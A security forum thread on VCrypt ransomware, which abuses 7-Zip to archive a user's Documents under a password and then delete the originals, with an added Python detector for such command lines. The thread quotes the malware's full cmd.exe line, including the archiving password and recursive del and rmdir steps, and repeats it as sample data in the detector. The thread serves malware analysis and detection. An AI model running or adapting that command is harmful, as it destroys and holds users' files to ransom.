CyberTech

Level 32
Verified
A new ransomware called VCrypt is targeting French victims by utilizing the legitimate 7zip command-line program to create password-protected archives of data folders.

BleepingComputer was told today about a new ransomware that was deleting all of a victim's files found in Windows data folders and then creating new "encrypted" files named after the folder name.

These encrypted files would utilize a naming format of username_foldername.vcrypt.

For example, the files in the Documents folder would be deleted, and a file named User_documents.vcrypt would be created, as shown in the image below.
 

MacDefender

Level 12
Verified
Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.

I sincerely hope that this evolved organically and our attempts to demonstrate a common behavior blocker weakness did not inspire real malware writers.

Unfortunately very very few AVs correctly identify this kind of an attack because most behavior blockers just look at the offending process (7zip in this case) and consider it trusted/whitelisted, as opposed to the whole chain of events that led to 7zip being started, or what exactly 7zip was told to do.
 

MacDefender

Level 12
Verified
FWIW, luckily, this ransomware is very poorly and dumbly coded:

Code:
2480 - C:\Windows\system32\cmd.exe /c if exist %USERPROFILE%\Documents\ for /F %i in (dir /b "%USERPROFILE%\\Documents\\*.*") do %TEMP%\mod_01.exe a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS %USERPROFILE%\%username%_documents.vcrypt %USERPROFILE%\Documents\* & del /f /s /q %USERPROFILE%\Documents\ & FOR /D %p IN (%USERPROFILE%\Documents\*) do rmdir %p /s /q

It uses a batch file and the del command to delete the documents. If they wanted to be smart, they'd use the "-sdel" argument to 7za. Attempting to directly delete the user's documents without abusing a whitelisted process triggers most behavior blockers that are able to AMSI-inspect batch files.
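The two posts above make the same point from opposite ends: a behavior blocker that only asks "is this process trusted?" misses the attack, while looking at what the archiver was told to do and what ran around it catches it. The following is an added example (not the page's code, not the PoCs, not the malware) of that second view in Python: it tokenizes Sysmon-style process-creation records, finds a 7-Zip "a" invocation by its argument grammar rather than the binary name (the sample renamed 7za to mod_01.exe), pulls out the -p password and output path, and only reports it when the same command line also deletes the inputs (del /s, rmdir /s, or -sdel). The events are constructed; dropper.exe as the parent is a hypothetical, and the benign 7zG.exe line is there to show what is not reported.

```python
"""Flag "archive with 7-Zip, then delete the originals" command lines.

Added example, not code from the page, the PoCs or the malware it discusses.
Instead of trusting the archiver binary it looks at what the archiver was told
to do (-p, output path, -sdel), what else runs on the same cmd.exe line and
which process started it. Records are Sysmon Event ID 1 style and constructed;
dropper.exe is a hypothetical parent.
"""
from __future__ import annotations
import re
from dataclasses import dataclass

SAMPLE_EVENTS = [
    {"pid": 1200, "ppid": 900, "image": r"C:\Users\User\AppData\Local\Temp\dropper.exe",
     "cmdline": r"dropper.exe"},  # hypothetical parent of the VCrypt batch logic
    {"pid": 2480, "ppid": 1200, "image": r"C:\Windows\system32\cmd.exe",
     "cmdline": (  # the VCrypt line quoted in the thread; mod_01.exe is a renamed 7za
         r'C:\Windows\system32\cmd.exe /c if exist %USERPROFILE%\Documents\ '
         r'for /F %i in (dir /b "%USERPROFILE%\\Documents\\*.*") do '
         r'%TEMP%\mod_01.exe a -t7z -r -mx0 -pOezfdse6f5esf413s5fd4e6fSQ45R424EDDEZS '
         r'%USERPROFILE%\%username%_documents.vcrypt %USERPROFILE%\Documents\* '
         r'& del /f /s /q %USERPROFILE%\Documents\ '
         r'& FOR /D %p IN (%USERPROFILE%\Documents\*) do rmdir %p /s /q')},
    {"pid": 3100, "ppid": 700, "image": r"C:\Program Files\7-Zip\7zG.exe",  # benign
     "cmdline": r'"C:\Program Files\7-Zip\7zG.exe" a -tzip "C:\Users\User\Desktop\trip.zip" '
                r'"C:\Users\User\Pictures\Trip"'},
]
SEVENZIP_SWITCH = re.compile(r"^-(t\w+|p\S*|mx=?\d?|r[-0]?|sdel|ssw|y|m\w+=\S+)$", re.I)
KNOWN_7ZIP_PATH = re.compile(r"^[a-z]:\\program files( \(x86\))?\\7-zip\\7z[ag]?\.exe$", re.I)
ARCHIVE_EXTS = (".7z", ".zip", ".tar", ".gz", ".xz", ".bz2", ".wim")

@dataclass
class ArchiveOp:
    executable: str
    password: str | None  # None: no -p switch; "": bare -p (prompt)
    archive: str | None
    inputs: list[str]
    deletes_inputs: bool  # 7-Zip's -sdel removes the inputs after archiving

def tokenize(cmdline: str) -> list[str]:
    """Split on whitespace, keeping "quoted strings" as single tokens."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def split_commands(tokens: list[str]) -> list[list[str]]:
    # Break one cmd.exe line into the sub-commands chained with & && | ||
    cmds = [[]]
    for t in tokens:
        if t in ("&", "&&", "|", "||"):
            cmds.append([])
        else:
            cmds[-1].append(t)
    return [c for c in cmds if c]

def parse_archive_op(tokens: list[str]) -> ArchiveOp | None:
    """Match '<exe> a <switches> <archive> <inputs...>' whatever the exe is called."""
    low = [t.lower() for t in tokens]
    for i, t in enumerate(low):
        if t == "a" and i > 0 and any(SEVENZIP_SWITCH.match(x) for x in tokens[i + 1:]):
            switches = [x for x in tokens[i + 1:] if x.startswith("-")]
            positional = [x for x in tokens[i + 1:] if not x.startswith("-")]
            password = next((s[2:] for s in switches if s.lower().startswith("-p")), None)
            return ArchiveOp(tokens[i - 1], password, positional[0] if positional else None,
                             positional[1:], "-sdel" in low)
    return None

def parse_recursive_delete(tokens: list[str]) -> str | None:
    """Return 'verb target' for a recursive del/erase/rmdir/rd sub-command, else None."""
    low = [t.lower() for t in tokens]
    for verb in ("del", "erase", "rmdir", "rd"):
        if verb in low and "/s" in low:
            rest = tokens[low.index(verb) + 1:]
            return f"{verb} {next((x for x in rest if not x.startswith('/')), '?')}"
    return None

def parent_chain(by_pid: dict[int, dict], pid: int) -> list[str]:
    # Image names of the process and its recorded ancestors, child first
    chain: list[str] = []
    while pid in by_pid and len(chain) < 32:
        chain.append(by_pid[pid]["image"].rsplit("\\", 1)[-1])
        pid = by_pid[pid]["ppid"]
    return chain

def analyze(events: list[dict]) -> list[dict]:
    """One finding per process that archives data and then removes the originals."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        cmds = split_commands(tokenize(e["cmdline"]))
        op = next((o for c in cmds if (o := parse_archive_op(c))), None)
        deletes = [d for c in cmds if (d := parse_recursive_delete(c))]
        if op is None or not (op.deletes_inputs or deletes):
            continue  # archiving alone is what users do too; the delete is the tell
        reasons = ["originals removed: " + ", ".join(deletes or ["-sdel"])]
        if op.password is not None:
            reasons.append("password-protected archive (-p)")
        if not KNOWN_7ZIP_PATH.match(op.executable):
            reasons.append("archiver run from unexpected path: " + op.executable)
        if op.archive and not op.archive.lower().endswith(ARCHIVE_EXTS):
            reasons.append("non-standard archive extension: " + op.archive)
        findings.append({"pid": e["pid"], "chain": parent_chain(by_pid, e["pid"]),
                         "archive": op.archive, "password": op.password,
                         "inputs": op.inputs, "reasons": reasons})
    return findings
```

`analyze(SAMPLE_EVENTS)` returns a single finding for pid 2480 with the chain cmd.exe <- dropper.exe, the recovered -p password, the .vcrypt output path and the reasons; the 7zG.exe invocation is not reported because nothing on its line removes the inputs. Matching on the argument grammar rather than the image name is deliberate, since the sample already ran 7za under a different file name; a production detector would additionally expand the environment variables and correlate with the file-system events, which this example does not attempt.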
 

geminis3

Level 16
Verified
Malware Tester

struppigel

Moderator
Verified
Staff member
Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.

Who said it is unrealistic? Zip abusing ransomware has been around for years, before those PoCs.

Also written in C 🤔
EDIT: looks like a cybercriminal recreated my PoC and removed the need for a local 7zip copy

The main code is a batch script.
 

MacDefender

Level 12
Verified
Who said it is unrealistic? Zip abusing ransomware has been around for years, before those PoCs.

I believe it was ESET or maybe another vendor. Basically they brushed off the proof of concept as not realistic because users archive their files using 7Zip too, or something along those lines. Either way it was a fairly dismissive analysis of a real problem I was trying to demonstrate, which is that a lot of behavior blockers turn a blind eye if a trusted process is the last agent to modify and delete your documents.
 
Well now it begins..... I wonder if some AV vendors are finding their statements a bit ironic about how TrojanZipperPOC and Ransominator are not realistic.

I sincerely hope that this evolved organically and our attempts to demonstrate a common behavior blocker weakness did not inspire real malware writers.

Unfortunately very very few AVs correctly identify this kind of an attack because most behavior blockers just look at the offending process (7zip in this case) and consider it trusted/whitelisted, as opposed to the whole chain of events that led to 7zip being started, or what exactly 7zip was told to do.
As an idea, maybe for people with AVs that have different levels of restriction (Kaspersky has it, I guess other AVs do too), restrict 7z to accessing just one folder, like the Downloads folder. Then it would just encrypt that folder in case of attack o_O

Might not be perfect, but I guess it would do the job.